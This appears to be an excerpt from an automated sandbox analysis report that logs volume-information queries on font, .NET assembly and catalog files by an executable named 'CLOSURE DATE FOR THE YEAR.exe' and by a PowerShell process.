Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
